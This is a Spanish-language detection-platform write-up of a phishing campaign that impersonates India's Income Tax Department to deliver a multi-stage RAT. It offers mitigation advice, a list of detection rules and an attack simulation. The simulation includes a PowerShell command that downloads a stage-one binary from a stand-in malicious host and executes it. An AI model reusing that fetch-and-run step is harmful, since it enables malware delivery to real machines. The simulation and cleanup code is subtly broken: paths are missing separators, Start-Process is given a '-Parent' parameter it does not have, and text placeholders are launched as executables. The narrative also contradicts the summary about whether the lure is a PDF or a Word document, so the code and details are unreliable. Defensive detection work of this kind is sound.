Campaña de Phishing Suplanta al Impuesto sobre la Renta de la India para Atacar a Empresas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una operación de phishing que suplanta al Departamento de Impuestos sobre la Renta de la India entrega un PDF con trampa que canaliza a los destinatarios a un portal de cumplimiento falso. El sitio solicita a las víctimas que descarguen un paquete ZIP que contiene un instalador NSIS firmado, el cual despliega un troyano de acceso remoto de múltiples etapas. El RAT persiste creando un servicio de Windows y se comunica con múltiples servidores C2 a través de puertos no estándar.
Investigación
Los investigadores analizaron la trampa en PDF, la URL incrustada y el flujo de trabajo encadenado del instalador NSIS. Documentaron los binarios depositados en el disco, la creación de una carpeta de instalación oculta y el registro de NSecRTS.exe como un servicio de Windows. El informe también capturó las comunicaciones salientes a tres direcciones IP y destacó el uso de cargas útiles firmadas a lo largo de la cadena de entrega.
Mitigación
Bloquee el dominio malicioso y las direcciones IP relacionadas en el perímetro y a través de controles de proxy. Fortalezca las protecciones de correo electrónico para marcar archivos adjuntos y enlaces temáticos de impuestos que conducen a portales de cumplimiento falsos. Evite la ejecución automática de instaladores no confiables cuando sea posible y monitoree la creación de servicios sospechosos, especialmente cualquier cosa nombrada “Windows Real-time Protection Service.”
Respuesta
Alerta sobre los nombres de archivos listados, hashes y la actividad de registro de servicios de Windows vinculada a la cadena de infección. Aísle los puntos finales afectados, adquiera imágenes de memoria y disco, y realice un barrido forense completo para identificar cualquier etapa o herramienta adicional del RAT. Elimine los artefactos de persistencia y restablezca las credenciales potencialmente expuestas para prevenir un reingreso.
Flujo de ataque
Detecciones
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (a través de DNS)
Ver
IOCs (DestinationIP) para detectar: Campaña de Phishing Temática de Impuestos sobre la Renta India Dirigida a Negocios Locales
Ver
IOCs (SourceIP) para detectar: Campaña de Phishing Temática de Impuestos sobre la Renta India Dirigida a Negocios Locales
Ver
IOCs (HashMd5) para detectar: Campaña de Phishing Temática de Impuestos sobre la Renta India Dirigida a Negocios Locales
Ver
Detección de Ejecución de Malware en Campaña de Phishing Temática de Impuestos sobre la Renta India [Creación de Procesos de Windows]
Ver
Detección de Comunicación C2 de NSecRTS.exe [Conexión de Red de Windows]
Ver
Ejecución de Simulación
Requisito Previo: La Verificación Previa de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa del Ataque y Comandos:
Un adversario entrega un correo electrónico de phishing titulado “Aviso de Impuestos sobre la Renta”. El archivo adjunto es un documento Word malicioso que descargasetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. La víctima ejecuta el archivo, lo que a su vez generaSibuia.exe(la carga útil verdadera) como su hijo. Esta cadena hijo‑padre está diseñada para eludir alertas genéricas de creación de procesos pero es captada por la regla Sigma.Pasos realizados en el host comprometido:
- Sueltan el binario de primera etapa:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Ejecute el binario de primera etapa:
Start-Process -FilePath $stage1 -NoNewWindow - El binario de primera etapa crea internamente el segundo binario de etapa
Sibuia.exeen el mismo directorio y lo lanza: (Simulado por el script de prueba a continuación.)
- Sueltan el binario de primera etapa:
-
Script de Prueba de Regresión:
El script a continuación reproduce la relación exacta padre‑hijo requerida para activar la regla.# ------------------------------------------------- # Simulación de cadena de phishing de Impuestos sobre la Renta de la India # ------------------------------------------------- # Definir rutas $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Crear binarios de prueba (de cero bytes – suficientes para registro de Sysmon) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Asegúrese de que los archivos sean ejecutables (Windows no necesita chmod) Write-Host "[*] Lanzando stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Dar a stage1 un momento para “generar” stage2 (simulado por lanzamiento directo) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 generando stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulación completa. Verificar detección en SIEM." # ------------------------------------------------- -
Comandos de Limpieza:
Eliminar los artefactos y terminar cualquier proceso persistente.# Detener cualquier proceso remanente Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Eliminar archivos Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Limpieza completa."